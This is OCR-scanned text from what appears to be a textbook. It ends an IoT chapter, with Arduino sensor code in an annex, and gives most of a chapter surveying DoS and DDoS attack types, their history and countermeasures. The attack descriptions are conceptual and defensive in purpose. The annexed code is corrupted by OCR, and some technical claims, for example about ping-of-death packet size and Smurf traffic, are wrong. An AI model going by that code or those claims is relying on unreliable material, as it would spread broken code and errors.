The connections are mentioned in Figure 8.5. Code [2] is mentioned in 
annexures. In [2] code, delay of 2000 is in microsecond; it can be modified 
to set the frequency of measurement. 9600 is the baud frequency (default). 

Here, in Figure 8.6, temperature and humidity are being measured, both 
of which values are shown. For example, 53 is humidity (%) and 33 is deg 
C. 

Similarly, many projects can be done using Arduino board, for example, 
soil moisture measurements of a plant, opening and closing the door of our 
garage or LED glowing in case of intrusion detection in our home/office. 
But generally repetitive tasks are preferred in Arduino and also much less 
computational task is performed. It is notable that internet connectivity is 
not used in the above tasks. On the other hand, let us see what work our 
Raspberry Pi can perform as compared to Arduino. 


8.4.3 Weather Monitoring System Using Raspberry Pi 


Weather nowadays has become most unpredictable as there have been a 
myriad of ecological imbalances in nature. From deforestation to pollution 
to soil erosion, humans have changed the environment according to their 
material needs. 

This in turn has resulted in the sporadic increase of natural calamities 
over the years. So, in planning to monitor the environmental imbalances 
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Figure 8.7 Working diagram of weather monitoring. 


which are about to occur, it is hoped that human lives can be saved by pre- 
dicting potential disasters beforehand. 

In Figure 8.7, [8], a Raspbian OS is used with Linux OS. A SD card can 
install the Raspbian OS on the Raspberry Pi. Python will be used to code 
on the device. Temperature, humidity, pressure, light intensity, level sen- 
sors are connected and these parameters are used to monitor the environ- 
ment and the measurements are sent to the cloud via internet (Wi-Fi) and 
then any server can be uploaded with the data as desired. Also, apps used 
by disaster management teams can be notified herewith. The GPS location 
of the place is also notified. 

In Figure 8.8 below, a flow chart is depicted where, on top, all the data 
is collected from the sensors, then it is sent to Raspberry Pi processor and 
that particular data is stored in CSV file at server. Now for analytics, this 
data can be sent to either apps, website, govt disaster relief team, etc. REST 
(Representational State Transfer) architectural principles are used to com- 
municate with HTTP (Hypertext transfer protocol). 
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8.5 Drawbacks of Arduino and Raspberry Pi 


Figure 8.8 Flow chart. 


Both Arduino and Raspberry Pi have several advantages compared to 
other conventional methods. Some interesting comparisons can be made 
between them. 

Arduino is a small microcontroller, the size of an atm card. It can do 
many small tasks without the need of an OS. It simply writes the code and 
executes it as its firmware interprets it. It is generally preferred for hardware 
projects and used where monitoring the readings without much execution 
part or a very small, less computational task is to be followed. Generally, an 
Arduino board is used for simple loopy tasks such as opening and closing 
a house door, gathering the outside temperature data or driving a simple 
motor, etc. 

While Arduino can be turned ON and OFF at any point of time without 
any risk or damage, when the power resumes, the code is run again. A bat- 
tery pack will suffice Arduino. It is cheaper than Raspberry Pi, as Arduino 
costs around $10-20 depending on the version [5]. For example, if a bulb 
needs to be ON, then Arduino is best suited, otherwise let us suppose tens 
of bulbs be ON with some condition, then Raspberry Pi will hold aces. 
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Arduino cannot be connected to internet but still if we want to use it, then 
its little tacky work as external Boards called “Shields” needs to be plugged 
in, to make Arduino as functional as Pi, with a proper coding to handle 
them. 

Raspberry Pi, on the other hand, is bigger in size compared to its for- 
mer counterpart. Also, there is Raspbian OS on SD card inside it. It has 
CPU anda GPU too. Computationally, it is more intensive. It has a Wi-Fi/ 
BLE port also. Raspberry Pi is best used for cumbersome tasks such as 
driving a robot, performing multiple tasks, or doing encryption calcu- 
lations. Pi is hard to run on batteries. The price of Raspberry is around 
$35-40 [4]. 

Pi can do parallel tasks like a computer does multi-tasking. For build- 
ing a complex project, Raspberry Pi is the best choice. It runs on an OS 
and must be properly shut down before turning OFF the power, otherwise 
OS and applications may get corrupt and can be damaged. Raspberry Pi 
is almost 40 times faster than Arduino. Pi has an Ethernet port, for con- 
nection to the networks. Also, internet can easily be run on Pi using USB 
Wi-Fi dongles. 


8.6 Challenges in IoT 


Owing to the vastness of the loT domain, there ought to be many challenges 
involved like Design challenges, Security challenges and Development 
challenges. These challenges can become a bottleneck for future work 
capabilities in this domain. Some of the prominent challenges occurring 
in IoT are listed below. 


8.6.1 Design Challenges 


The challenges [11] generally involve the deploying of IoT products in 
unstable network areas. For example, with poor GSM/GPRS signals. Also, 
sometimes, the environment adds to the woes. As the power consump- 
tion of the sensor nodes in the architecture should be minimal owing to 
the size of the service area and unavailability of charging areas, so devices 
should be made with minimal power consumption or maybe charged with 
solar power. A proper strategy of choosing NVM (Non-Volatile Memory) 
should be made as during network failure, internal NVM, stores the criti- 
cal data. A secondary partition for failover handling can be made in those 
critical times. 
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8.6.2 Security Challenges 


Are the most important challenges of all [10]. Insufficient testing and 
non-modification of IoT products before they are launched in the market 
is the main grave concern affecting security. In the mad race for making 
fast money, many big companies ignore these security loopholes. 

Brute force attack, Default passwords, IoT malware and ransomware 
are a few other security challenges [10]. Due to so many different layers 
of authorization and authentication involved, the privacy of the users is 
jeopardized. 


8.6.3 Development Challenges 


Some newbie enterprises don't have an exact idea of IoT infrastructure and 
thus try to get into this domain before getting any design or test, creat- 
ing implementation issues [10]. Data miners, experts and analysts are also 
required at the end IoT level 6 and 7 where a final report has to be created 
out of the raw data from sensors. So knowledge of specialized technologies 
and manpower is a big requirement in this loT technology. 


8.7. Conclusion 


As a result of the enormous growth of IoT, it has become a highly capable 
technology that can cause gigantic developments in the technology field. 
Moreover, it’s a high probability that IoT will be the go-to technology in the 
near future. Edge computing technology has also been looked upon. As all 
the sensors don’t send all data to the cloud, as it would be too much to han- 
dle, thus edge computing comes into the picture. The technology computes 
important computations at the sensor nodes only and only sends required 
data further to the cloud, thus reducing the load on the cloud. However, 
it too has limitations and so, in future a mixture of edge computing and 
blockchain would be inevitable for the growth of IoT. 

IoT technology has been the most upcoming and talked about of the 
promising technologies for the future. There has been lots of research in 
the ongoing domain. Communication has become indispensable for the 
prosperity of human beings, so this technology enhances it. Imagine our 
car talking to us or communicating with other vehicles in the vicinity, or 
our jug in the refrigerator alerting us that milk is about to run out soon. 
These are a few examples of areas where IoT can do wonders. As more and 
more things are getting involved with IoT, obviously the security, privacy, 
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and availability of data remains an issue. The applications of loT range from 
smart homes, future agriculture farming, smart city, healthcare, industrial 
automation and much more. When many technologies or architectures 
meet to benefit a common cause, accountability is always a point to pon- 
der. Likewise, future insights can be provided by Blockchain regarding the 
accountability issues, and maybe these two can provide a better and more 
robust system for future generations. Blockchain can settle the privacy and 
reliability concerns in IoT. 


8.8 Annexures 


1 

const int trigPin = 13; 

const int echoPin = 12; 

void setup() { 

Serial.begin(9600);} 

void loop() 

{ 

long duration, inches, cm; 

pinMode(trigPin, OUTPUT); 

digital Write(trigPin, LOW); 
delayMicroseconds(2); 

digital Write(trigPin, HIGH); 
delayMicroseconds(10); | 

digital Write(trigPin, LOW); 
pinMode(echoPin, INPUT); 

duration = pulseIn(echoPin, HIGH); 

inches = microseconds ToInches(duration); 
cm = microsecondsToCentimeters(duration); 
Serial.print(inches); 

Serial.print("in, "); 

Serial.print(cm); 

Serial.print("cm"); 

Serial.println(); 

delay(1000); 

} 

long microsecondsToInches(long microseconds) 
{return microseconds / 74 / 2; 

} 

long microsecondsToCentimeters(long microseconds) 
{return microseconds / 29 / 2;} 


HARDWARE DEVICES INTEGRATION WITH IOT 157 


2 
#include <dht11.h> 
#define DHT11PIN 4 


dht11 DHT11; 


void setup() 


{ 
Serial.begin(9600); 


} 


void loop() 
{ 


Serial.println(); 
int chk = DHT11.read(DHT11PIN); 


Serial.print("Humidity (%): "); 
Serial.println((float)/DHT11-humidity, 2); 


Serial.print("Temperature (C):"); 
Serial.println((float) DHT11.temperature, 2); 


delay(2000); 
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Abstract 

Denial of Service (DoS) attacks are some of the most expensive and threatening 
cyberattacks that exist on the internet. Their main aim is to restrict the users/ 
victims’ access to a specific resource. This chapter comprises all ideas, classification, 
and solutions to a DoS attack. DoS compromises the availability goal of the CIA 
triad [16]. Here, DoS attacks are classified into the network and attacker behavior 
like TCP SYN, which is network-based, whereas a UDP attack is bandwidth-based. 
Distributed Denial of Service (DDoS) is the revamped and advanced version of 
DoS which uses multiple sources/zombies/agents to carry out the attack. Zombies/ 
Agents are the compromised computers that attackers use to attack another com- 
puter. Viruses, worms, and Botnet are the main reasons for DDoS attacks. Due to 
DoS attacks, there is a threat to major new technologies such as VANET, IoT, etc., 
which are not yet fully developed. To avoid DoS attacks users must install regular 
security patches, antivirus, and anti-trojan software and also run firewalls. Post- 
Attack Forensics is the type of countermeasure in which a pattern of the traffic of 
a previous DDoS attack is collected to identify and block the same kind of attack. 


Keywords: DoS, CIA triad, TCP SYN, UDP, zombies, VANET, IoT, post-attack 
forensics 
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9.1 Introduction 


The Internet is the most valuable asset in the 21st century. Every business in 
the world tries to get benefit through it. The Internet has become the power- 
house of websites, business, and communication channels, with slight dis- 
ruption of any sector causing huge inconvenience to users, owners, and 
service providers. The unavailability of Internet services leads to immense 
financial losses [2]. The disruption can be either natural like due to power 
failure or due to planned cyberattacks. Cyberattacks are attacks carried out 
with the help of computers, network devices, or both. Mostly these attacks 
are carried out to extract money and disrupt others’ business [19]. 

Denial of Service (DoS) attacks are some of the most expensive and 
threatening cyberattacks that exist on the Internet now. DoS is a type of 
attack in which the main aim is to restrict the users/victims’ access to a spe- 
cific resource [3]. It focuses on blocking and disrupting permitted access 
to a resource by restricting the system’s operation and function. DDoS is 
the modified and advanced version of DoS. Distributed Denial of Services 
(DDoS) is the same as a DoS attack but uses multiple sources/zombies/ 
agents to carry out the attack. Zombies/Agents are compromised comput- 
ers that attackers use to attack another computer. Attackers take advan- 
tage of security vulnerabilities, backdoors, viruses, worms, and more to 
compromise the computer system to create zombies. Zombies function as 
a node that follows the attacker’s commands and sends a huge volume of 
data and queries to websites, or sends numerous spam emails to a single 
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Figure 9.1 DDoS using zombie network [13]. 
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email address, preventing the victim from accessing the resource or caus- 
ing service providers to suffer. DoS and DDoS compromise the availability 
goal of the CIA triad. 

Due to DoS and DDoS attacks on major commercial websites such as 
Amazon, eBay, CNN, Yahoo, and other websites have faced major finan- 
cial losses and inconsistent connectivity. These attacks sometimes cause a 
threat to public security, as in 2003 when the Houston port system in Texas 
was taken down [2]. 


9.1.1 Objective and Motivation 


The objective of this paper is to gain new insight into one of the most 
threatening cyberattacks, ie., Denial of Service (DoS). Each year many 
companies, personnel, and governments face huge losses in the financial 
sector and many of them lose their reputation and brand value. The study 
is carried out to discover the behavior and phenomenon of DoS attacks, 
and to accrue knowledge about their nature and how frequently these 
attacks affect the resource and power of individuals/companies/govern- 
ment. This chapter focuses on how to deal with Denial of Service (DoS) 
and Distributed Denial of Service (DDoS) attacks with the help of differ- 
ent countermeasures and defense mechanisms. The purpose of this study 
is to analyze the growth in the severity of DoS and DDoS attacks, which 
can help us to build advanced defense measures by tracking their activity 
through analyzing attackers’ previous approaches. Due to the huge wid- 
ening of Internet users, the attacker always gets a feasible way to attack 
any users, so to enable people to wake up to the risk that is presented, this 
paper gives some insight and knowledge. 
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Figure 9.2 Average annual cost of cyberattack by its type (2018 costs about US$13.0 
million) [4]. 
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The study carried out by Accenture and the Ponemon Institute in 2018 
found that Denial of Service is the third most expensive IT security crime 
for victim organizations [4]. 

According to more than 2,600 security and IT professionals at 355 orga- 
nizations around the world [4], DoS attacks have increased victim cost by 
nearly 10% in 2018 as compared to 2017. 

DDoS attacks also continue to grow. Here are some statistics that can 
affect the potential market forecasts for 2020 and beyond [6]: 


1. According to Cisco Visual Networking Index (VNI) - 2017 
data, DDoS assaults are projected to grow twice of 14.5 mil- 
lion by 2022 globally. 

2. The impact of dominant DDoS attacks is widespread; about 
25% of all web traffic is used when they are active. 

3. According to Kaspersky’s SecureList, China and the United 
States were the most common targets for DDoS attacks in 
Q2 2019, up 84& from Q1. 

4. According to the Al0 Network Study, the agency monitored 
over 20.3 million DDoS resources in Q2 2019. 


The scale of DDoS assault has grown dramatically in recent years, 
according to Arbor Network’s 12" annual report in Waterman, and these 
attacks are steadily rising year by year. In Figure 9.3, in the last 10 years, the 
growth of attack by volume size increases tremendously with major growth 
seen in 2016 [5]. 
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Figure 9.3 Size of DDoS attack in Gb/s [5]. 
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9.1.2 Symptoms and Manifestations 


Symptoms of Denial-of-Service attacks, according to the U.S. Computer 
Emergency Response Team, include [8]: 


. Network output that is unusually slow. 

. A particular web page is unavailable. 

. Unable to open any website. 

. The amount of spam messages obtained has skyrocketed— 
(the following form of DoS is known as an email bomb). 


BR wWN 


9.2 Literature Survey 


In paper [2], among the three goals of computer security, availability 
describes the accessibility of desired resources on time. DoS attacks are 
attacks which disrupt the availability goal of internet security. The CERT 
Coordination Center describes three specific types of attacks: 1) the dis- 
ruption or modification of configuration information, 2) the use of finite, 
restricted, or nonrenewable resources, and 3) the physical disruption or 
modification of connected devices. They have looked into different DoS 
attack mechanisms and summarized a more realistic taxonomy of attack 
and also provided some comprehensive taxonomy on defense practices. 
After reviewing a huge number of research proposals, the existing tax- 
onomy on attacks has added some new attack classification and could be 
added more shortly. 

In [28], the authors discuss a sequence of Denial of Service attacks 
against a victim’s computer and suggest a DoS attack mitigation algorithm. 
The requesting client passes through three layers of this algorithm for 
effective verification. The TCP 3-way handshake can be exploited by flood- 
ing a huge number of TCP SYN requests, which results in system crashes 
and unresponsive servers. Packet monitoring using TTL Approach and 
Anomaly Detection using Entropy are two approaches that are not ideal 
methods for preventing but can be used. Based on retrieval time, the sug- 
gested algorithm outperforms current algorithms in detecting legitimate 
users and stopping attackers from accessing the server. 

In [14], both proven and possible attack pathways are used to explain 
the attack taxonomy. Along with this definition, this research goes through 
key characteristics of each attack type, which helps to characterize the 
complexities of countering these attacks. The end-to-end approach is used 
in Internet architecture: connecting end hosts use dynamic features and 
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functions to attain expected service promises. It was found that to gain 
unparalleled strength and survivability, attackers collaborate to share 
attack code and knowledge about compromised computers, as well as to 
assemble their agents into organized networks. 

In [21], to detect and identify anomalous network traffic behavior, 
an advanced intrusion detection system (IDS) is needed. The method is 
assisted in this article using the most recent dataset that contains the most 
common forms of DDoS attacks, such as (HTTP flood, SIDDoS). To detect 
DoS attacks, Decision trees are utilized in conjunction with well-known 
classification approaches such as Naive Bayes, Support Vector Machine 
(SVM), and Multilayer Perceptron (MLP). Machine learning techniques 
are important for providing insight into the severity of an attack and, as a 
result, allowing businesses to take appropriate steps to minimize specific 
attacks which would permit the scope of attacks on a network link or an 
entity to be measured, allowing the network to be protected by appropriate 
firewall laws. 

In [26], engineering scalable security technologies designed for the loT 
environment are needed to execute safe loT growth. The growth in IoT 
has also triggered the frequency of DoS attacks as the low-end IoT devices 
do not have robust encryption mechanisms, making them vulnerable to 
attacks. Software-Defined Networking (SDN) is a hopeful model which 
would help detect and reduce Denial of Service (DoS) and Distributed 
Denial of Service (DDoS) risks in the 5G networks. A stateful Software- 
Defined Networking (SDN) protection is an approach that can be used 
to identify and minimize DoS and DDoS attacks using the principle of 
entropy as the detection mechanism. 


9.3 Timeline of DoS and DDoS Attacks 


In 1974, 13-year-old David Dennis performed the first DoS attack. Dennis 
wrote a program that forced a few computers in a nearby college research 
lab to shut down using the “external” or “ext” command [7]. Two decades 
later, Panix, one of the oldest ISPs in the world, was the target of a DoS 
attack, according to theory. On September 6, 1996, Panix was hit by a SYN 
flooding attack, which knocked out the company’s networks for weeks 
while device manufacturers, particularly Cisco, worked out an appropriate 
defense. Khan C. Smith demonstrated a DoS attack on the Las Vegas Strip 
in 1997 at a DEF CON conference by shutting down Internet connections 
for more than an hour. Following the publication of that code, countless 
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Internet attacks against EarthLink, E-Trade, Sprint, and other companies 
occurred over the next few years [8]. 

DDoS is a more sophisticated and complex version of DoS attacks. In 
late 1999, comments in the code indicated that a major attack was planned 
for December 31 but fortunately never happened [9]. In 2000, the first 
recorded DDoS attacks that hit several popular internet sites, like eBay, 
CNN, E-Trade, and Yahoo, were carried out by a 15-year-old boy, Michael 
Calce, using a cover named “Mafiaboy”. Calce hacked into several uni- 
versity computer networks. He used their servers to launch a distributed 
denial-of-service (DDoS) assault. In 2016, a huge DDoS attack targeted 
Dyn, a big domain name system (DNS) vendor, knocking out prominent 
internet sites and services like GitHub, Amazon, CNN, Airbnb, Spotify, 
PayPal, Netflix, Visa, The New York Times, and Reddit [10]. 

On March 1, 2018, GitHub was struck by a 1.35 Tb/s attack. On March 
5, 2018, an unidentified consumer of Arbor Networks, a US-based service 
provider, was hit by the biggest single DDoS attack to that point, with a 
high of around 1.7 Tb/s. In February 2020, Amazon Web Services (AWS) 
was hit by an attack with a record high intensity of 2.3 Tb/s. In June 2019, 
during the anti-extradition riots in Hong Kong, the chatting application 
Telegram changed into an allotted denial of service (DDoS) attack geared 
toward stopping protesters from the usage of it to coordinate their move- 
ments [8]. 


9.4 Evolution of Denial of Service (DoS) & 
Distributed Denial of Service (DDoS) 


Virus, Worms, Malware, Spyware, and BotNets are the type of malicious 
code designed to exploit vulnerabilities and resources. According to [1], 
a Trojan horse is a script that appears to do one thing while doing some- 
thing else behind the scenes. Apart from worms and viruses, Trojans do 
not spread by attacking other resources or replicating themselves; instead, 
they generate security holes that enable unauthorized users to gain access 
to a device [11]. In the same way, as a virus is a self-replicating program 
that binds itself to executable programs, so is a worm. Robert T. Morris 
revealed the first big Internet worm, the ‘88 RTM Internet Worm, in 
1988 [1]. 

Attackers can use that script to carry out Distributed Denial of Service 
attacks until they have an army of infected computers. Code Red, Code 
Red II, and Sasser are worms that can infiltrate hundreds and thousands 
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of computers and transform them into attack targets [1]. The targeted web 
addresses receive multiple requests at a time from several infected comput- 
ers leading to a denial of service. These Trojan programs infect computers 
and carry out DoS attacks called Trojan-DDoS [12]. Mytob and its various 
variants, as well as Bayfraud, Fanbot, and Bagle have all appeared recently. 
Malicious scripts have been a significant cause of discussion in big enter- 
prises because they often cause downtime. 

Even if the biggest botnet found using calculation and identification 
techniques only had 20,000 servers there have been reports of 100,000- 
host zombie networks. Extortion, identity theft, and credit card fraud are 
all popular uses for armies. Leaks of hacker “Bot-Wars” expose their stra- 
tegic sophistication when they fight for possession of these valuable items 
by creating scripts that eliminate their competitors before they have the 
biggest army. 

Due to the use of IRC networks and protocols, it is now harder to 
recognize Distributed Denial-of-Service networks, as these enable a 
valid network service to monitor a community of Distributed Denial- 
of-Service zombies through outbound connections to a standard service. 
Since these communication channels get a lot of traffic, an intrusion 
could go unnoticed. The attacker is also helped by the IRC server, which 
keeps track of which agents are available online. The intruder can access 
the IRC server, which gets this information through IRC network soft- 
ware alerts [1]. 


9.5 DDoS Attacks: A Taxonomic Classification 


To conceive a DDoS attack taxonomy, we must first classify the attacks in 
terms of their actions and properties [14]. The trait of the attack is defined 
by analyzing the methods that are used to carry out and plan the attack. In 
Figure 9.4, the DDoS attack is classified into various types according to the 
behavior of attacks, such as the impact of attacks, types of automation, the 
rate dynamics of attacks, and many more. 


9.5.1 Classification Based on Degree of Automation 


The attacker must first identify a compromised agent computer and inject it 
with malicious code to plan for the attack. We distinguish among Manual, 
Semi-Automatic, and Automatic DDoS attacks based on the degree of 
automation [15]. 
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Figure 9.4 Classification of DDoS attacks by degree [15]. 


e Manual: The intruder manually scans remote devices for 
bugs, gains access to them, downloads the attack code, and 
then orders the attack to begin. 

e Semi-Automatic: The DDoS network in semi-automated 
attacks is made up of handler (master) and agent (slave, dae- 
mon, zombie) computers. Recruit, hack, and infect are all 
automatic processes. During the usage process, the attacker 
determines the attack type, onset, length, and target to zom- 
bies, which then deliver packets to the target through the 
handler. 

e Automatic: In an automation DDoS attack, the attack code 
pre-programs the attack’s start time, attack form, length, 
and victim. Since the attacker is only interested in issuing 
a single instruction at the outset of the procurement pro- 
cess, the deployment methods of this attack class expose the 
attacker to the bare minimum. Additionally, if agents inter- 
act through IRC networks, these channels may be used to 
make changes to the current code. 


9.5.2 Classification Based on Exploited Vulnerability 


Distributed Denial of Service attacks use a variety of tactics to prevent the 
target from providing service to its customers. On the basis of Exploited 
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vulnerabilities, we distinguish among brute-force attacks and protocol 
attacks [14]. 


e Protocol Attack: Protocol attacks take advantage of a partic- 
ular function or implementation flaw in a protocol built on 
the victim to absorb a large portion of its resources. Examples 
include the CGI request attack, the TCP SYN attack, and the 
authentication server attack. 

e Brute-force Attacks: These attacks are carried out by launch- 
ing a large number of apparently legal transfers. The target 
network's resources are exhausted since an originating net- 
work can typically have more traffic bandwidth than the tar- 
get system can handle. 


9.5.3 Classification Based on Rate Dynamics of Attacks 


The Rate Dynamics of Attack are classified into two different rate attacks, 
namely Constant rate and Variable rate attack [15]. 


¢ Constant Rate: A constant rate function is used in the major- 
ity of documented attacks. Agent machines produce attack 
packets at a constant rate after the onset order is sent, typi- 
cally as many as their resources allow. The victim's services 
are easily disrupted by the unexpected packet surge. 

e Variable Rate: Variable rate attacks change an agent machine's 
attack rate to slow or stop detection and reaction. 


9.5.4 Classification Based on Impact 


Based on the impact of a DDoS attack on the target, we can distinguish 
among degrading and disruptive strikes [14]. 


e Disruptive Attack: Disruptive attacks aim to stop the target 
from providing service to its customers. 

e Degrading Attack: The aim of degrading attacks is to drain 
a specific percentage of a target’s resources continuously. 
Because these threats don’t cause complete service interrup- 
tion, they can go unrecognized for an extended period. 
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9.6 Transmission Control Protocol 


Transmission Control Protocol (TCP) is a standard for establishing con- 
nections using IP suites. The communications devices should create a link 
before transmitting data and close the connection after transmitting the 
data, according to communication-orientation. HTTP, HTTPs, SMTP, 
FTP and Telnet use TCP. 


9.6.1 TCP Three-Way Handshake 


When a device needs to make a TCP/IP link (the most popular internet 
connection), it sends TCP/SYN and TCP/ACK packets of data to another 
computer, typically a server. 

Steps performed during TCP 3-way handshake [17]: 


1. A randomized sequence number is sent by the client to the 
server in an SYN (synchronize) packet. 

2. The sender transmits an SYN-ACK packet with a random- 
ized sequence number and an ACK that acknowledges the 
client’s sequence number. 

3. In response to the server sequence number, the client shares 
the ACK number with the server. 
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Figure 9.5 TCP 3-way handshake [17]. 
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4. Both sides use the same sequence numbers. Data will now 
be sent and received independently from both parties. 


9.7 User Datagram Protocol 


UDP is a TCP/IP data transfer protocol. Since UDP is a “stateless” protocol, 
it does not accept whether or not a packet has been sent. As a consequence, 
the UDP protocol is widely used in video streaming [18]. 


9.7.1 UDP Header 


The UDP header is a plain 64-bits static header. Since each UDP port field 
is 2 bytes long, the port number range is 0 to 65535, with 0 being reserved. 
Various user queries or procedures are identified by port numbers. 


8 Bytes 


UDP Header UDP Data 


16 bits 16 bits 
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Figure 9.6 UDP header [29]. 


e Source Port: Used to recognize several sources and is 16 bits 
long. 

e Destination Port: Utilized to recognize the destined packet 
port and is 16 bits long. 

e Length: It includes the UDP header and the data; is of 
2-Bytes Field. 

e Checksum: The field is 16-bits. 


9.8 Types of DDoS Attacks 


DoS (Denial of Service) assault is categorized in several ways depending on 
the network and the attacker’s actions. Because of their ease, Distributed 
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Figure 9.7 DDoS attacks types [5]. 


Denial of Service (DDoS) attacks are becoming increasingly common with 
hacktivists, script kiddies, and hackers. In Figure 9.7, the types of DDoS 
attacks are divided by their attack characteristics. Here, the main five DDoS 
attack types are explained briefly. 


9.8.1 TCP SYN Flooding Attack 


TCP SYN flooding, also known as the TCP half-open attack, occurs when 
a user sends an SYN packet from the host to the server in order to create 
an approved TCP Connection. SYN and a valid source address may be 
used to establish a connection. The server responds with an ACK to the 
client’s SYN packet, then waits for the client’s response before allocating 
memory to that client. This wastes memory and time on the server. The 
victim server will buffer connection requests until the client responds after 
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Figure 9.8 TCP SYN flood [3]. 


establishing a half-open connection. There is a timeout policy in place, and 
the connection will be terminated when the timer expires. The attacker 
sends SYN packet connection requests incessantly, outpacing the server's 
ability to expire pending connection requests. Due to the following activ- 
ity, 3-way handshake will be affected by DoS Attack [20]. 


9.8.2 UDP Flooding Attack 


In UDP flooding, the attacker uses IP packets having UDP packets to target 
and exploit the host’s random ports as one type of huge volume DoS attack. 
During this type of attack, the hosts search for applications associated with 
specific datagrams. If none are found, the host returns to the sender with 
an “Unreachable Destination” envelope. As a result of the flood bombard- 
ment, the network will be overwhelmed and therefore unable to respond 
to legitimate traffic [21]. 


9.8.3 Smurf Attack 


The Smurf attack utilizes the Internet protocol to bombard a DoS assault. 
It has several benefits over the Internet Control Message Protocol (ICMP) 
and the IP. The ICMP protocol is used by network components and admin- 
istrators to communicate between nodes [20]. Massive groups of ICMP 
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Figure 9.9 UDP flood [21]. 


packets are transmitted to a network connection across an IP relay address, 
the majority of which use the target’s fake source IP. Devices on the web 
can respond by replying to the source IP address. If the number of devices 
receiving and reacting to this kind of packet on the network is large, traffic 
will overpower the attacker’s machine [21]. 


9.8.4 Ping of Death Attack 


It is a form of DoS attack where the attacker sends an IP packet of more 
than 65,536 bytes, which is permissible by the IP protocol. TCP/IP protocol 


Attacker Victim 


Figure 9.10 Smurf attack [20]. 
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Figure 9.11 Ping of death [20]. 


fragments incoming packets into subpackets, which is one of its functions. 
When the attackers discovered the packet split into small packets total- 
ing more than 65,536 bytes, they took advantage of this capability. When 
an extra-large packet is sent, several operating systems are unsure what to 
do. The operating systems eventually froze, rebooted, and/or crashed as a 
result [20]. 


9.8.5 HTTP Flooding Attack 


An HTTP flooding is a DDoS attack that is designed to overload a sin- 
gle server with HT TP-GET requests. There would be denial of service for 
individual queries by genuine users when the target has been flooded with 
inquiries and is unable to respond to normal traffic [21]. 
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Figure 9.12 HTTP flood attack [21]. 
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9.9 Impact of DoS/DDoS on Various Areas 


9.9.1 DoS/DDoS Attacks on VoIP Networks Using SIP 


The mechanism for transmitting speech and visual information through 
Internet Protocol (IP) networks is known as Voice over IP (VoIP). As a 
result of its inexpensive and high level of support, VoIP systems are dis- 
placing traditional solutions around the world. With fifth-generation voice 
service, VoIP is anticipated to be the leading platform for (5G) networks. 
The Session Initiation Protocol (SIP) is implemented by most VoIP net- 
works to conduct signaling methods. SIP is a simple text-based protocol 
that can be attacked in a variety of ways. The intruder normally goes after 
the SIP server to discourage consumers from utilizing VoIP resources or 
to lower the efficiency of the services provided. Flooding and malformed 
communications are the most common DoS attacks [22]. 


9.9.2. DoS/DDoS Attacks on VANET 


A vehicular Ad hoc Network (VANET) is a form of network in which vehi- 
cle nodes can connect on the road in a multi-hop manner. VANET is con- 
cerned about the safety of human life when people are on the road. It aims 
to provide accurate data to road drivers. Because of the design of the open 
wireless interface used in VANET, the VANET is vulnerable to a variety of 
attacks. The attackers’ goal is to cause problems for legitimate users, result- 
ing in services becoming unavailable, resulting in a denial of service. The 
following are the possible DoS attacks [23]. 


e Sybil Attack. 

e Node Impersonation. 

e Sending False Information. 
e ID Disclosure. 
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Figure 9.13 DOS attack in vehicle-to-infrastructure communications [23]. 
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Figure 9.14 DOS attack in vehicle-to-vehicle communications [23]. 


9.9.3 DoS/DDoS Attacks on Smart Grid System 


A smart grid system is an electricity grid that incorporates several opera- 
tional and energy-saving features, such as Smart distribution boards and 
circuit breakers, advanced metering technology, solar energies, energy- 
efficient resources, and enough utility-grade optical fiber [25]. 

The following are some characteristics of the Smart Grid network 
infrastructure: 


e Traffic model. 

e Communication model. 
e Protocol stack. 

e Timing requirement. 


Although IEC 61850 is focused on TCP/IP and Ethernet, IEDs in a 
power station can become victims of DoS attacks such as movement flood- 
ing and TCP SYN attack. Jamming attacks can also become a key security 
concern as wireless devices are implemented in a substation [24]. 


9.9.4 DoS/DDoS Attacks in IoT-Based Devices 


The Internet of Things (IoT), which anticipates the automated connectiv- 
ity of sensors and devices while providing a variety of smart facilities, has 
sparked a huge market for embedded devices. However, the computing, 
storage, and networkability of these oT devices are minimal, making them 
easy to exploit. Due to the low support of strong security mechanisms in 
IoT devices, they easily get exposed and attackers take advantage of the 
same; by interfering with malicious networks they can easily perform DoS 
and DDoS attacks [26]. 
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9.10 Countermeasures to DDoS Attack 


Preventing initial device compromises is the main protection against 
DDoS attacks. In most cases, this entails downloading fixes, antivirus 
applications, configuring a firewall, and keeping an eye out for intruders. 
The most attentive hosts, though, may become targets as a result of less 
equipped, less security-aware hosts. It’s hard to monitor against being the 
ultimate target of a DDoS attack, but it’s a lot easier to protect against being 
used as a zombie or master machine. 


9.10.1 Prevent Being Agent/Secondary Target 


The avoidance of secondary victim networks to engage in DDoS attacks is 
among the most successful ways to prevent DDoS attacks. To prevent sec- 
ondary targets from being compromised with the DDoS zombie malware, 
these devices must constantly monitor their defense. They should ensure 
there are no zombie programs installed on their networks, and that zombie 
data traffic is not indirectly sent through the network. 
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Figure 9.15 Countermeasures to DDoS attack [27]. 
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9.10.2 Detect and Neutralize Attacker 


To stop attackers from performing DDoS attacks, victims need to detect 
and neutralize handlers. Examining the network protocols and collecting 
network traffic between attackers and agents or attackers and clients is 
one method for identifying network nodes that could be compromised by 
attacker malware. So, finding and shutting the handler down will neutral- 
ize the DDoS attack. 


9.10.3 Potential Threats Detection/Prevention 


Egress filtering and MIB (Management Information Base) figures may be 
used to recognize or deter a feasible DDoS assault. Egress filtering is the 
process of scanning IP packet headers and checking if it is fulfilling their 
criteria. The packets are routed outside of the network from which they 
are derived if they meet the requirements. If anything in the packets does 
not follow the requirements, it will not be sent. If the system administrator 
installs a firewall in the sub-network to block any packets without a source 
IP address from the sub-network, several DDoS packets with duplicate/ 
fake IP addresses will be discarded. 


9.10.4 DDoS Attacks and How to Avoid Them 


All regular and DDoS attacks will benefit from load balancing. To pre- 
vent critical links from going down in an attack, network operators may 
improve bandwidth on them. Another method suggested to save the sys- 
tem from shutting down is throttling. The server-centric Max-min Fair 
router throttle approach configures routers that connect to a server with a 
logical function that adjusts (throttles) arriving packets to server-capable 
speeds. This will protect servers from flood damage. 


9.10.5 Deflect Attack 


Honeypots are networks that are knowingly set up for low security to catch 
an attacker. Honeypots are used to prevent threats from reaching the net- 
works they are defending, as well as to gather intelligence about threats by 
recording their actions and discovering what types of attacks and technical 
techniques they are using. By tracking the attacker, we get to know about 
the attacker and can defend against him in the future. 
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9.10.6 Post-Attack Forensics 


If data on traffic patterns is collected throughout a DDoS attack, it could 
be studied afterward to check for unique features in that malicious attack. 
This feature information could be utilized to improve the reliability and 
security capacity of load balancing and throttling countermeasures by 
upgrading them. Packet traceback methods are recommended to aid in 
